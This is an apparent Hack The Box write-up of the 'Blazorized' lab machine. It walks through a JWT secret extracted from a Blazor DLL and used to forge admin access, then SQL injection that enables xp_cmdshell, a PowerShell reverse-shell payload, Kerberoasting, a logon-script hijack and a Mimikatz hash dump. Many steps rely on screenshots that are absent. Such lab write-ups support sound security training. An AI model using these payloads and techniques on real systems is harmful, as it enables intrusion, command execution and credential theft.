Introduction to Blazorized:
This write-up will explore the “Blazorized” machine from Hack The Box, categorized as a Hard difficulty challenge. This walkthrough will cover the reconnaissance, exploitation, and privilege escalation steps required to capture the flag.
Objective on Blazorized machine:
The goal of this walkthrough is to complete the “Blazorized” machine from Hack The Box by achieving the following objectives:
User Flag:
SQL injection with JWT secret exploitation
- Analyze a website built using the Blazor .NET framework.
- Reverse a DLL file from the server to the browser to extract the JWT secret.
- Use the JWT secret to gain access to the admin panel.
- Exploit a SQL injection vulnerability within the admin panel for command execution.
- Gain shell access by leveraging the SQL injection.
Root Flag:
Kerberoast attack and Mimikatz enumeration
- Exploit the WriteSPN privilege to perform a targeted Kerberoast attack and retrieve service account credentials.
- Use permissions to modify another user’s login script, providing a further exploitation opportunity.
- Abuse the GetChangesAll permission with Mimikatz to dump domain hashes.
- Retrieve administrator credentials and gain shell access as an administrator.
Enumerating the Machine
Reconnaissance:
Nmap Scan:
Begin with a network scan to identify open ports and running services on the target machine.
nmap -sC -sV -oN nmap_initial.txt 10.10.11.22Nmap Output:
┌─[darknite@parrot]─[~/Documents/htb/blazorized]
└──╼ $nmap -sC -sV 10.10.11.22 -oA initial
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-09 00:06 EST
Nmap scan report for 10.10.11.22
Host is up (0.17s latency).
Not shown: 987 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http Microsoft IIS httpd 10.0
|_http-title: Did not follow redirect to http://blazorized.htb
|_http-server-header: Microsoft-IIS/10.0
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-11-09 05:06:49Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: blazorized.htb0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
1433/tcp open ms-sql-s Microsoft SQL Server 2022 16.00.1115.00; RC0+
| ms-sql-info:
| 10.10.11.22\BLAZORIZED:
| Instance name: BLAZORIZED
| Version:
| name: Microsoft SQL Server 2022 RC0+
| number: 16.00.1115.00
| Product: Microsoft SQL Server 2022
| Service pack level: RC0
| Post-SP patches applied: true
| TCP port: 1433
|_ Clustered: false
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2024-11-08T04:01:58
|_Not valid after: 2054-11-08T04:01:58
|_ssl-date: 2024-11-09T05:07:09+00:00; +1s from scanner time.
| ms-sql-ntlm-info:
| 10.10.11.22\BLAZORIZED:
| Target_Name: BLAZORIZED
| NetBIOS_Domain_Name: BLAZORIZED
| NetBIOS_Computer_Name: DC1
| DNS_Domain_Name: blazorized.htb
| DNS_Computer_Name: DC1.blazorized.htb
| DNS_Tree_Name: blazorized.htb
|_ Product_Version: 10.0.17763
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: blazorized.htb0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
Service Info: Host: DC1; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
| smb2-time:
| date: 2024-11-09T05:07:00
|_ start_date: N/A
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 53.74 secondsAnalysis:
- Port 53 (DNS): DNS service running Simple DNS Plus.
- Port 80 (HTTP): HTTP server using Microsoft IIS 10.0, with redirect to
http://blazorized.htb. - Port 88 (Kerberos): Kerberos authentication service, confirming an Active Directory environment.
- Port 135 (RPC): Microsoft RPC, used for remote procedure calls.
- Port 139 (NetBIOS): NetBIOS session service for SMB file sharing and browsing.
- Port 389 (LDAP): LDAP service for Active Directory on
blazorized.htb. - Port 445 (SMB): SMB protocol (possibly for file sharing), not fully identified.
- Port 464 (kpasswd): Service for Kerberos password change.
- Port 593 (RPC over HTTP): Remote procedure calls over HTTP, often used by Exchange.
- Port 636 (LDAP over SSL): LDAP encrypted with SSL, status not fully confirmed.
- Port 1433 (MSSQL): Microsoft SQL Server 2022 (version 16.00.1115.00), instance
BLAZORIZED, configured with NTLM. - Port 3268 (Global Catalog LDAP): Global Catalog LDAP for Active Directory, allowing cross-domain searches.
- Port 3269 (Global Catalog LDAP over SSL): LDAP with SSL for the Global Catalog, status unclear.
Web Enumeration:
Perform web enumeration to discover potentially exploitable directories and files.
gobuster vhost -u http://10.10.11.22-w /opt/Seclist/Discovery/DNS/subdomains_top1million-5000.txt
Gobuster Output:
A significant amount of output returns with a 400 status, as illustrated above.
You will obtain two results; if the API is not visible post-scan, it indicates its absence. A 404 response will be returned, preventing ffuf from scanning the result using -mc all.
The website appears straightforward, with limited areas for further investigation.
We cannot access the SMB server, as demonstrated in the screenshot above.
Let’s access the subdomain “admin,” where it appears as a login page.
Blazor server enumeration
I would like to conduct further research on Blazor Server, as it has piqued my interest.
Before the release of .NET 8, the snippet sample apps for Blazor Server and Blazor WebAssembly provided code examples featured in Blazor articles. While many components in these snippet apps could compile and run if copied into a local test app, the entire apps were not intended to be fully functional demonstration samples. Their main purpose was to offer code examples for documentation.
With the release of .NET 8 (and future versions), the sample apps for both Blazor Web App and Blazor WebAssembly now include code snippets for articles and serve as fully functional demonstration apps.
When attempting to access the main page, there are numerous DLL files involved.
One of the JavaScript files provides some information about the application.
Let’s save one of the DLL files to our machine. Once we downloaded and examined the DLL files, we found the following:
private const long EXPIRATION_DURATION_IN_SECONDS = 60L;
private static readonly string jwtSymmetricSecurityKey = "8697800004ee25fc33436978ab6e2ed6ee1a97da699a53a53d96cc4d08519e185d14727ca18728bf1efcde454eea6f65b8d466a4fb6550d5c795d9d9176ea6cf021ef9fa21ffc25ac40ed80f4a4473fc1ed10e69eaf957cfc4c67057e547fadfca95697242a2ffb21461e7f554caa4ab7db07d2d897e7dfbe2c0abbaf27f215c0ac51742c7fd58c3cbb89e55ebb4d96c8ab4234f2328e43e095c0f55f79704c49f07d5890236fe6b4fb50dcd770e0936a183d36e4d544dd4e9a40f5ccf6d471bc7f2e53376893ee7c699f48ef392b382839a845394b6b93a5179d33db24a2963f4ab0722c9bb15d361a34350a002de648f13ad8620750495bff687aa6e2f298429d6c12371be19b0daa77d40214cd6598f595712a952c20eddaae76a28d89fb15fa7c677d336e44e9642634f32a0127a5bee80838f435f163ee9b61a67e9fb2f178a0c7c96f160687e7626497115777b80b7b8133cef9a661892c1682ea2f67dd8f8993c87c8c9c32e093d2ade80464097e6e2d8cf1ff32bdbcd3dfd24ec4134fef2c544c75d5830285f55a34a525c7fad4b4fe8d2f11af289a1003a7034070c487a18602421988b74cc40eed4ee3d4c1bb747ae922c0b49fa770ff510726a4ea3ed5f8bf0b8f5e1684fb1bccb6494ea6cc2d73267f6517d2090af74ceded8c1cd32f3617f0da00bf1959d248e48912b26c3f574a1912ef1fcc2e77a28b53d0a";
private static readonly string superAdminEmailClaimValue = "superadmin@blazorized.htb";
private static readonly string postsPermissionsClaimValue = "Posts_Get_All";
private static readonly string categoriesPermissionsClaimValue = "Categories_Get_All";
private static readonly string superAdminRoleClaimValue = "Super_Admin";
private static readonly string issuer = "<http://api.blazorized.htb>";
private static readonly string apiAudience = "<http://api.blazorized.htb>";
private static readonly string adminDashboardAudience = "<http://admin.blazorized.htb>";Based on the above, it can be concluded that the code snippet consists of constants and read-only fields associated with JWT handling in a .NET application, commonly found in applications utilizing JWT authentication.
The JWT code for the super admin will resemble something like the above.
We should add a new token to LocalStorage column
Success! We were able to access the admin.blazorized.htb dashboard using the token we added earlier.
Exploitation
Web Application Exploitation:
From there, you can easily navigate to the administrator page, which often contains an SQL injection vulnerability.
I then clicked on the left where I saw a query icon—there were two options, so I clicked on one and casually tested it: “Check Duplicate Post Titles” and “Check Duplicate Category Names.“
The command that we can use in this situation is
';exec sp_configure 'xp_cmdshell','1';reconfigure;--
It is a success!
Let’s test if the SQL injection command works by using a ping to our machine.
It work like charms!
Let’s begin by starting our listener.
The payload is given below:
';EXEC master..xp_cmdshell 'powershell -e base64 '')" --
We have established a reverse shell connection.
We can view the user flag by typing “type user.txt“.
Escalate to Root Privileges Access for Blazorized Machine
Privilege Escalation:
Bloodhound enumeration
The screenshot above is the enumeration from the Bloodhound tool.
An interesting observation is that it is possible to write the SPN to RSA_4810, enabling the retrieval of a hash. However, the hash must be cracked to obtain the original password.
Since the BloodHound path does not indicate the next steps, let’s investigate which accounts possess elevated permissions.
After analyzing the data from BloodHound, I decided to use Powerview.ps1.
We successfully obtained information on RSA_4810.
RSA_4810 enumeration on Blazorized machine
We also retrieved the hash for the RSA_4810 user access.
After some time, we successfully retrieved the password for the next user access.
Let’s log in with the credentials we found earlier.
I inserted the ScriptPath where RSA-4810 has full access to the suspicious account. The shell.bat file will execute whenever SSA_6010 logs in.
We have successfully logged in as SSA_6010.
Execute the following command to obtain the admin NTLM hash
Let’s log in as root and view the root flag by typing “type root.txt“.
No responses yet